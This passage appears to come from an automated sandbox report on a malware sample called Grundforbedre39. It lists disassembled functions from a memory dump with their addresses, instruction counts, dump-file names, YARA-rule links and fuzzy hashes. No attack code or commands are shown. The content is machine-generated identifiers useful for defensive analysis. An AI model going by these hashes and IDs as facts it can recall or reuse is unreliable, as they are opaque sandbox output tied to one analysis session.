                                                                                      • Instruction ID: 0607c5415b250375b79c64e22cb15433f850e01926059784b0af91e87a8eab19
                                                                                      • Opcode Fuzzy Hash: 83fdeb804b958492fdd84e141993f3fb3002a6c7051f7cec353e05700268e5a8
                                                                                      • Instruction Fuzzy Hash: D321DEB4209740AFEB399F25C845F5637B2BF40260F640A5AE846475E0DB61B942CBE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355EB781 Relevance: .1, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 096110916e8771f39866c61b55970d27ab168fc49ee226d58229fa36cf43422b
                                                                                      • Instruction ID: 7160e509be7e391035ed183dbbeaa10a14f086c046f3d26e94d45ab797c8f5bc
                                                                                      • Opcode Fuzzy Hash: 096110916e8771f39866c61b55970d27ab168fc49ee226d58229fa36cf43422b
                                                                                      • Instruction Fuzzy Hash: DC21C97AA06215AFEB118F59C884F8ABBB8FF457A6F018465E904AB310D730ED00CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35513722 Relevance: .1, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e924c87cb097831d3842f649e565355fd17b23c5fe169ee18f8f9b0c553fe501
                                                                                      • Instruction ID: 6405ff89ee1dec8c71f1e7f898127f780230e8ac45a03383508d38c799db9bd2
                                                                                      • Opcode Fuzzy Hash: e924c87cb097831d3842f649e565355fd17b23c5fe169ee18f8f9b0c553fe501
                                                                                      • Instruction Fuzzy Hash: 8A2180B2610118AFDB00CF58CD91F5ABBB9FB44648F260469E905AB251D7B1EE018BD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35532755 Relevance: .1, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0a5ca4d49b6cb5d70963fdf0c7caf27751f202f7ba10be1348ad4897f334c490
                                                                                      • Instruction ID: 1cde9a3d3eff73bb313fb330842fba29431c5d22e203ff2b0b5b8d202aa46bbb
                                                                                      • Opcode Fuzzy Hash: 0a5ca4d49b6cb5d70963fdf0c7caf27751f202f7ba10be1348ad4897f334c490
                                                                                      • Instruction Fuzzy Hash: C021087574AB909BF316876CCC44F147BA6BF85BB4F2507A0ED299B6E1DB68B800C250
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3554A22B Relevance: .1, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5cb8edd55df0097146080d4f6b3ec222cee36b7ca54f01876bb30780eda66b01
                                                                                      • Instruction ID: bb6acc9859785c144dbb24944ea698e02153cdd5149b1333314220968c23deec
                                                                                      • Opcode Fuzzy Hash: 5cb8edd55df0097146080d4f6b3ec222cee36b7ca54f01876bb30780eda66b01
                                                                                      • Instruction Fuzzy Hash: 70219879601A00AFD765CF69C801B56B3F5BF48B04F248868A509CB762E731E882DB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355314C9 Relevance: .1, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
                                                                                      • Instruction ID: aa6ab1126582c01572f536558f91e38cb9cc9ac9393d6f2987108f903386afa2
                                                                                      • Opcode Fuzzy Hash: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
                                                                                      • Instruction Fuzzy Hash: 2B21A1756066919FE306CBA9C940F0577E9FF44790F1504A1DD058B692E766FC80C751
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550B705 Relevance: .1, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: deb6b13663e08e3ac8e5f12c311a30d3606ae7c0d52ca78f27faa03c9e47245b
                                                                                      • Instruction ID: 4c1265626cd254b23be3e4bae7bf81616ae863b5ea601a038de0e970f42b2bde
                                                                                      • Opcode Fuzzy Hash: deb6b13663e08e3ac8e5f12c311a30d3606ae7c0d52ca78f27faa03c9e47245b
                                                                                      • Instruction Fuzzy Hash: 7A213072221A00EFC726DF58C991F5AB7F5FB58228F154969E00697AA1CB74F842CB84
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35518690 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 040c97b5f39855860541456accb81ee84ad1fc8726f128a7fd8cf5e19de0e2bc
                                                                                      • Instruction ID: 623ae3f0b3c1166ca040ac78fa8a556a7e4891d8e99dc57a277bc2172705ce5a
                                                                                      • Opcode Fuzzy Hash: 040c97b5f39855860541456accb81ee84ad1fc8726f128a7fd8cf5e19de0e2bc
                                                                                      • Instruction Fuzzy Hash: F211B2797056119BEF15CF48C480A1ABBE5FF4A790B5540A9ED09AF300D7B7FA01CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35540044 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 07fe18246059bae6519d56581238e9ea6a0f608c29a6bb59b239af0e38e8ce3e
                                                                                      • Instruction ID: 8e1a961bf4bdf153aaff982899e2c9301745381fb99387f49e0cd6d820811857
                                                                                      • Opcode Fuzzy Hash: 07fe18246059bae6519d56581238e9ea6a0f608c29a6bb59b239af0e38e8ce3e
                                                                                      • Instruction Fuzzy Hash: 4411E2B3600704AFE7128F54D840FAE7BB9EB84764F60442AE6059F190E671F944CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35513640 Relevance: .1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1f7f8b32b2da7986e54e90b66c37e4432cb720b1367c0c223802833c0a7f3b39
                                                                                      • Instruction ID: 4aa715af15ee758cfe946703aad260bab10a91418a55241ea7e4811283ec44e4
                                                                                      • Opcode Fuzzy Hash: 1f7f8b32b2da7986e54e90b66c37e4432cb720b1367c0c223802833c0a7f3b39
                                                                                      • Instruction Fuzzy Hash: 8521C575A042099BFB01DF59D4547EE7BB4BB98318F668018DC13573D0CBB8AA85CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35518009 Relevance: .1, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ba38dad2b49856355131f143786e615b2d088e9560811d4db7ce465e3b29172b
                                                                                      • Instruction ID: fc35a4cf3fe262030ce9788194e279b6dc85d9f1808f6f96e8adbbc6d7c35588
                                                                                      • Opcode Fuzzy Hash: ba38dad2b49856355131f143786e615b2d088e9560811d4db7ce465e3b29172b
                                                                                      • Instruction Fuzzy Hash: EA214975A00209DFDB14CFA8C590AAABBB6FB88718F24416DD505AB350CB75BE46CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3554666D Relevance: .1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 78b3e4c0da75da920e4e059cc7c79906df3b2075763b7f1715a7ee32907f3420
                                                                                      • Instruction ID: c0b4e1944580c144f255f916a4c9c07d33bf5983aa1391dc60d255d76a4179f8
                                                                                      • Opcode Fuzzy Hash: 78b3e4c0da75da920e4e059cc7c79906df3b2075763b7f1715a7ee32907f3420
                                                                                      • Instruction Fuzzy Hash: E32156B5605B00EFD320CF68C890F66B3F8FB84650F90882DE59AD7650DB70B840CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355091F0 Relevance: .1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 983f943145b676c7d20d192e29e73f7a0639370513690e303962ba6c7a89ab89
                                                                                      • Instruction ID: 0b362b5931ffbf6355ad102d50c7b53a5e4080a82da209e73f050fbc5841e63c
                                                                                      • Opcode Fuzzy Hash: 983f943145b676c7d20d192e29e73f7a0639370513690e303962ba6c7a89ab89
                                                                                      • Instruction Fuzzy Hash: 8F11D07A23A645BBD3248F51EA40A7277F8FB98A91F500025E400A7290EF34ED43C7A5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355A6400 Relevance: .1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e73379b15d20921c36d17d65806ee93928949c2c91e1cc7ade05177be736197e
                                                                                      • Instruction ID: f1f2d49589be375c1e04c739f82d87bb31689ab23129e816c1a1fa48c5be19f7
                                                                                      • Opcode Fuzzy Hash: e73379b15d20921c36d17d65806ee93928949c2c91e1cc7ade05177be736197e
                                                                                      • Instruction Fuzzy Hash: A211BC33682600AFD313CEA9C980F4E77A8EB89B60F014425B2069B290DA70F905C7E0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355465D0 Relevance: .1, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 248b3e28a38b44dcbf7db67ed2f78d4260f79d84be2c577816db8ee254d7ee04
                                                                                      • Instruction ID: ad2c02c8762f9a3fd13cb1591fe3ae3e256d301f125a31e70ebc3a768d084db8
                                                                                      • Opcode Fuzzy Hash: 248b3e28a38b44dcbf7db67ed2f78d4260f79d84be2c577816db8ee254d7ee04
                                                                                      • Instruction Fuzzy Hash: 32116AB6A02305AFCB14CF59D580A4ABBF9AB94690F41806AD809AB350DB70ED01CBD4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355DA464 Relevance: .1, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a5432dcbfc0a6abf50d41a4a4fafd4673f1928ef86e7f08b68302e31250835f
                                                                                      • Instruction ID: cb566b1fac4770ca4f47185d0b9dc82def996e58298553573f6df21710d6d225
                                                                                      • Opcode Fuzzy Hash: 3a5432dcbfc0a6abf50d41a4a4fafd4673f1928ef86e7f08b68302e31250835f
                                                                                      • Instruction Fuzzy Hash: D911B237600919AFDB19CB58C805A9EF7F5EF84210F058269EC5697350EA75BE51CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3553270D Relevance: .1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c349bf7d5dd35ae4be29b90c9c9e6296549565a6cc527c79a2abd2401209f98c
                                                                                      • Instruction ID: 8454eec87ac15df80a6337be25896482db7fd3a0f174d7a98ae7face354b6d4d
                                                                                      • Opcode Fuzzy Hash: c349bf7d5dd35ae4be29b90c9c9e6296549565a6cc527c79a2abd2401209f98c
                                                                                      • Instruction Fuzzy Hash: 7A01267574AB80AFF31986AAC888F177B9DFF80390F950461F9088B690DE55FC00C261
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355145B0 Relevance: .1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 136c42afbfaba90b464a69a726cd49f26466002be6f14bc12eabae4c34609dc6
                                                                                      • Instruction ID: a8b8bb1549b1743d04c967c26ac31619543fdfe4c21813712138f942924161ea
                                                                                      • Opcode Fuzzy Hash: 136c42afbfaba90b464a69a726cd49f26466002be6f14bc12eabae4c34609dc6
                                                                                      • Instruction Fuzzy Hash: 1E11C2B6604384EFEB11CF65D880F467BA8FB947AAF815515FC098B680C770FA41CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355CD270 Relevance: .1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ee2e26103c56e3ebca9147c0b518a09aa240128e4c2f43fdf9f4fe4a4821c6d0
                                                                                      • Instruction ID: 581e6a54b1f542fc53ee3c96bc719cb1ff64a3238f008789a0e5778e4e45d7b9
                                                                                      • Opcode Fuzzy Hash: ee2e26103c56e3ebca9147c0b518a09aa240128e4c2f43fdf9f4fe4a4821c6d0
                                                                                      • Instruction Fuzzy Hash: BF018B72B00649AB9B04CBE6D845CAF7BBCEFC4755B41009AA902D3240EB30FA01D760
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35546540 Relevance: .1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b8aa828dd0342d122b591466081a2640f734720b33df2ddecff1d51c64c145fd
                                                                                      • Instruction ID: c197a86ee669434e5b29e3d979add0a65edc3a87c8ae330852afdc9e1f44e72c
                                                                                      • Opcode Fuzzy Hash: b8aa828dd0342d122b591466081a2640f734720b33df2ddecff1d51c64c145fd
                                                                                      • Instruction Fuzzy Hash: 8E117CB6A02654AFDB21DF59D980B9EB7B8FF88740FD10455D902A7244DB70BA058BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3553E45E Relevance: .1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
                                                                                      • Instruction ID: f6faee29a54575457af3eda8e01a50b880ee87f255877b8894a4487669ddbeb0
                                                                                      • Opcode Fuzzy Hash: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
                                                                                      • Instruction Fuzzy Hash: EE11C476646B918FE302C714C955B0577E8FF45BB8F5A04E0DD18DB681DB68F881C790
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35543740 Relevance: .1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d1d84f449b18a81ff5cc7a34092c7079ed5eb580d02bea09f19d0cf08beb1b4
                                                                                      • Instruction ID: 5d0d50d85e30ef5066911dbda02bb24836de16d6b2e6909cbd3f158030b56076
                                                                                      • Opcode Fuzzy Hash: 6d1d84f449b18a81ff5cc7a34092c7079ed5eb580d02bea09f19d0cf08beb1b4
                                                                                      • Instruction Fuzzy Hash: 531149B861424ADFD740CF18D480A86BBF4FB59310F85829AE888CB311D735E9C0CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3553F1F0 Relevance: .1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ec571b067b617c5d1f04703ff51725a021e824bfb808b3550c5ab6ec1d95491b
                                                                                      • Instruction ID: df07ccbdb140069dc7a2fd5efb9e809c019e0684e6758dc89c8057f38ae37ee8
                                                                                      • Opcode Fuzzy Hash: ec571b067b617c5d1f04703ff51725a021e824bfb808b3550c5ab6ec1d95491b
                                                                                      • Instruction Fuzzy Hash: BD11C2B5701748DFD710CFA9C844B9EB7B8BF44610F51047AE905EB691DA78E901CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550A200 Relevance: .1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
                                                                                      • Instruction ID: 19439934a8273f21b26eb438f6b0f73a3ea9646303560980c1140f7d60c4dc7d
                                                                                      • Opcode Fuzzy Hash: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
                                                                                      • Instruction Fuzzy Hash: A1012276505B12ABCB218F55D940A2A7BF4FF857B0B00893DFC968B290C731E548CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35516179 Relevance: .1, Instructions: 51COMMON
